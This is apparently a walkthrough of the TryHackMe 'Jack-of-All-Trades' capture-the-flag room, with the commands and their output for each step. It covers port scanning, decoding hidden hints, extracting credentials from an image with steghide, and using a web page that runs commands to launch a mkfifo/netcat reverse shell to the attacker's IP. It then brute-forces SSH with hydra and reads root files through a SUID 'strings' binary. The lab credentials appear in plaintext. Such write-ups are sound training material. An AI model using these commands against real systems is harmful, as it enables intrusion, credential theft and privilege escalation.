# Jack-of-All-Trades

https://tryhackme.com/room/jackofalltrades

*** ## Enumeration ```bash sudo nmap -p- -sS --min-rate 5000 -Pn -n -vv -oA nmap/Jack-of-All-Trades 10.66.188.30 PORT STATE SERVICE REASON 22/tcp open ssh syn-ack ttl 62 80/tcp open http syn-ack ttl 62 ``` ```bash nmap -p 22,80 -sCV -oA nmap/openPorts 10.66.188.30 PORT STATE SERVICE VERSION 22/tcp open http Apache httpd 2.4.10 ((Debian)) |_ssh-hostkey: ERROR: Script execution failed (use -d to debug) |_http-server-header: Apache/2.4.10 (Debian) |_http-title: Jack-of-all-trades! 80/tcp open ssh OpenSSH 6.7p1 Debian 5 (protocol 2.0) | ssh-hostkey: | 1024 13:b7:f0:a1:14:e2:d3:25:40:ff:4b:94:60:c5:00:3d (DSA) | 2048 91:0c:d6:43:d9:40:c3:88:b1:be:35:0b:bc:b9:90:88 (RSA) | 256 a3:fb:09:fb:50:80:71:8f:93:1f:8d:43:97:1e:dc:ab (ECDSA) |_ 256 65:21:e7:4e:7c:5a:e7:bc:c6:ff:68:ca:f1:cb:75:e3 (ED25519) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel ``` ```bash curl http://10.66.188.30:22 -O index.html ``` ```html Jack-of-all-trades!

Welcome to Jack-of-all-trades!

My name is Jack. I'm a toymaker by trade but I can do a little of anything -- hence the name!
I specialise in making children's toys (no relation to the big man in the red suit - promise!) but anything you want, feel free to get in contact and I'll see if I can help you out.

My employment history includes 20 years as a penguin hunter, 5 years as a police officer and 8 months as a chef, but that's all behind me. I'm invested in other pursuits now!

Please bear with me; I'm old, and at times I can be very forgetful. If you employ me you might find random notes lying around as reminders, but don't worry, I always clear up after myself.

I love dinosaurs. I have a huge collection of models. Like this one:

I make a lot of models myself, but I also do toys, like this one:

I hope you choose to employ me. I love making new friends!

Hope to see you soon!

Jack

``` ```bash echo 'UmVtZW1iZXIgdG8gd2lzaCBKb2hueSBHcmF2ZXMgd2VsbCB3aXRoIGhpcyBjcnlwdG8gam9iaHVudGluZyEgSGlzIGVuY29kaW5nIHN5c3RlbXMgYXJlIGFtYXppbmchIEFsc28gZ290dGEgcmVtZW1iZXIgeW91ciBwYXNzd29yZDogdT9XdEtTcmFxCg==' | base64 -d Remember to wish Johny Graves well with his crypto jobhunting! His encoding systems are amazing! Also gotta remember your password: u?WtKSraq ``` ```bash curl http://10.66.188.30:22/recovery.php -O ``` ```html Recovery Page

Hello Jack! Did you forget your machine password again?..





``` ```bash echo 'GQ2TOMRXME3TEN3BGZTDOMRWGUZDANRXG42TMZJWG4ZDANRXG42TOMRSGA3TANRVG4ZDOMJXGI3DCNRXG43DMZJXHE3DMMRQGY3TMMRSGA3DONZVG4ZDEMBWGU3TENZQGYZDMOJXGI3DKNTDGIYDOOJWGI3TINZWGYYTEMBWMU3DKNZSGIYDONJXGY3TCNZRG4ZDMMJSGA3DENRRGIYDMNZXGU3TEMRQG42TMMRXME3TENRTGZSTONBXGIZDCMRQGU3DEMBXHA3DCNRSGZQTEMBXGU3DENTBGIYDOMZWGI3DKNZUG4ZDMNZXGM3DQNZZGIYDMYZWGI3DQMRQGZSTMNJXGIZGGMRQGY3DMMRSGA3TKNZSGY2TOMRSG43DMMRQGZSTEMBXGU3TMNRRGY3TGYJSGA3GMNZWGY3TEZJXHE3GGMTGGMZDINZWHE2GGNBUGMZDINQ=' | base32 -d | tr 'A-Za-z' 'N-ZA-Mn-za-m' | tr 'A-Za-z' 'N-ZA-Mn-za-m' | xxd -r -p | tr 'A-Za-z' 'N-ZA-Mn-za-m'; echo Remember that the credentials to the recovery login are hidden on the homepage! I know how forgetful you are, so here's a hint: bit.ly/2TvYQ2S ``` ```bash python -m http.server Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ... 127.0.0.1 - - [30/Mar/2026 18:27:01] "GET / HTTP/1.1" 200 - 127.0.0.1 - - [30/Mar/2026 18:27:01] code 404, message File not found 127.0.0.1 - - [30/Mar/2026 18:27:01] "GET /assets/style.css HTTP/1.1" 404 - 127.0.0.1 - - [30/Mar/2026 18:27:01] code 404, message File not found 127.0.0.1 - - [30/Mar/2026 18:27:01] "GET /assets/header.jpg HTTP/1.1" 404 - 127.0.0.1 - - [30/Mar/2026 18:27:01] code 404, message File not found 127.0.0.1 - - [30/Mar/2026 18:27:01] "GET /assets/stego.jpg HTTP/1.1" 404 - 127.0.0.1 - - [30/Mar/2026 18:27:01] code 404, message File not found 127.0.0.1 - - [30/Mar/2026 18:27:01] "GET /assets/jackinthebox.jpg HTTP/1.1" 404 - ``` ```bash curl 10.66.188.30:22/assets/jackinthebox.jpg -O curl 10.66.188.30:22/assets/style.css -O curl 10.66.188.30:22/assets/header.jpg -O curl 10.66.188.30:22/assets/stego.jpg -O mkdir assets mv jackinthebox.jpg stego.jpg style.css header.jpg assets/ ``` ```bash python -m http.server Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ... 127.0.0.1 - - [30/Mar/2026 18:36:16] "GET / HTTP/1.1" 304 - 127.0.0.1 - - [30/Mar/2026 18:36:16] "GET /assets/style.css HTTP/1.1" 200 - 127.0.0.1 - - [30/Mar/2026 18:36:16] "GET /assets/style.css HTTP/1.1" 200 - 127.0.0.1 - - [30/Mar/2026 18:36:16] "GET /assets/stego.jpg HTTP/1.1" 200 - 127.0.0.1 - - [30/Mar/2026 18:36:16] "GET /assets/jackinthebox.jpg HTTP/1.1" 200 - 127.0.0.1 - - [30/Mar/2026 18:36:16] "GET /assets/header.jpg HTTP/1.1" 200 - ``` ```bash steghide extract -sf header.jpg Enter passphrase: wrote extracted data to "cms.creds". cat cms.creds Here you go Jack. Good thing you thought ahead! Username: jackinthebox Password: TplFxiSHjY ``` ```bash curl http://10.66.188.30:22/recovery.php -d 'user=jackinthebox&pass=TplFxiSHjY' -v * Trying 10.66.188.30:22... * Established connection to 10.66.188.30 (10.66.188.30 port 22) from 192.168.192.129 port 60930 * using HTTP/1.x > POST /recovery.php HTTP/1.1 > Host: 10.66.188.30:22 > User-Agent: curl/8.19.0 > Accept: */* > Content-Length: 33 > Content-Type: application/x-www-form-urlencoded > * upload completely sent off: 33 bytes < HTTP/1.1 302 Found < Date: Mon, 30 Mar 2026 22:17:22 GMT < Server: Apache/2.4.10 (Debian) < Set-Cookie: PHPSESSID=54ui6jfgq8krldt7s6rug81nm1; path=/ < Expires: Thu, 19 Nov 1981 08:52:00 GMT < Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 < Pragma: no-cache < Set-Cookie: login=jackinthebox%3Aa78e6e9d6f7b9d0abe0ea866792b7d84; expires=Wed, 01-Apr-2026 22:17:22 GMT; Max-Age=172800 < location: /nnxhweOV/index.php < Content-Length: 0 < Content-Type: text/html; charset=UTF-8 < * Connection #0 to host 10.66.188.30:22 left intact ``` ```bash curl -c cookies.txt -L http://10.66.188.30:22/recovery.php -d 'user=jackinthebox&pass=TplFxiSHjY' GET me a 'cmd' and I'll run it for you Future-Jack. ``` ```bash curl -b cookies.txt http://10.66.188.30:22/nnxhweOV/index.php GET me a 'cmd' and I'll run it for you Future-Jack. ``` ## Exploitation ```bash nc -lnvp 1111 Listening on 0.0.0.0 1111 ``` ```bash curl -G -b cookies.txt http://10.66.188.30:22/nnxhweOV/index.php?cmd=ls --data-urlencode "cmd=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.192.129 1111 >/tmp/f" GET me a 'cmd' and I'll run it for you Future-Jack. curl: (3) URL rejected: No host part in the URL ``` ```bash nc -lnvp 1111 Listening on 0.0.0.0 1111 Connection received on 10.66.188.30 57667 /bin/sh: 0: can't access tty; job control turned off ``` [interactive-shell](https://estebanzarate.gitbook.io/hackache/linux/interactive-shell "mention") ## Post-Exploitation ```bash www-data@jack-of-all-trades:/var/www/html$ cd /home/ www-data@jack-of-all-trades:/home$ ls jack jacks_password_list www-data@jack-of-all-trades:/home$ cat jacks_password_list *hclqAzj+2GC+=0K eN@ 0HguX{,fgXPE;8yF sjRUb4*@pz<*ZITu [8V7o^gl(Gjt5[WB yTq0jI$d}Kae)vC4} 9;}#q*,A4wd{6r,y4krSo ``` ```bash hydra -l jack -P passwords.txt -s 80 ssh://10.66.188.30 -t 4 Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-03-30 20:09:06 [DATA] max 4 tasks per 1 server, overall 4 tasks, 24 login tries (l:1/p:24), ~6 tries per task [DATA] attacking ssh://10.66.188.30:80/ [80][ssh] host: 10.66.188.30 login: jack password: ITMJpGGIqg1jn?>@ 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2026-03-30 20:09:13 ``` ```bash ssh jack@10.66.188.30 -p 80 ** WARNING: connection is not using a post-quantum key exchange algorithm. ** This session may be vulnerable to "store now, decrypt later" attacks. ** The server may need to be upgraded. See https://openssh.com/pq.html jack@10.66.188.30's password: jack@jack-of-all-trades:~$ ``` ```bash jack@jack-of-all-trades:~$ ls -la total 312 drwxr-x--- 3 jack jack 4096 Feb 29 2020 . drwxr-xr-x 3 root root 4096 Feb 29 2020 .. lrwxrwxrwx 1 root root 9 Feb 29 2020 .bash_history -> /dev/null -rw-r--r-- 1 jack jack 220 Feb 29 2020 .bash_logout -rw-r--r-- 1 jack jack 3515 Feb 29 2020 .bashrc drwx------ 2 jack jack 4096 Feb 29 2020 .gnupg -rw-r--r-- 1 jack jack 675 Feb 29 2020 .profile -rwxr-x--- 1 jack jack 293302 Feb 28 2020 user.jpg ``` ```bash scp -P 80 jack@10.66.188.30:/home/jack/user.jpg /home/melvin/thm/ ** WARNING: connection is not using a post-quantum key exchange algorithm. ** This session may be vulnerable to "store now, decrypt later" attacks. ** The server may need to be upgraded. See https://openssh.com/pq.html jack@10.66.188.30's password: user.jpg ```
## User flag {% hint style="success" %} sec\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*13} {% endhint %} ## Privilege Escalation ```bash jack@jack-of-all-trades:/$ find / -type f -perm -4000 2>/dev/null /usr/lib/openssh/ssh-keysign /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/pt_chown /usr/bin/chsh /usr/bin/at /usr/bin/chfn /usr/bin/newgrp /usr/bin/strings /usr/bin/sudo /usr/bin/passwd /usr/bin/gpasswd /usr/bin/procmail /usr/sbin/exim4 /bin/mount /bin/umount /bin/su ``` ```bash jack@jack-of-all-trades:/$ strings /root/root.txt ToDo: 1.Get new penguin skin rug -- surely they won't miss one or two of those blasted creatures? 2.Make T-Rex model! 3.Meet up with Johny for a pint or two 4.Move the body from the garage, maybe my old buddy Bill from the force can help me hide her? 5.Remember to finish that contract for Lisa. 6.Delete this: sec*******************************************0a} ``` ## Root flag {% hint style="success" %} sec\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*0a} {% endhint %}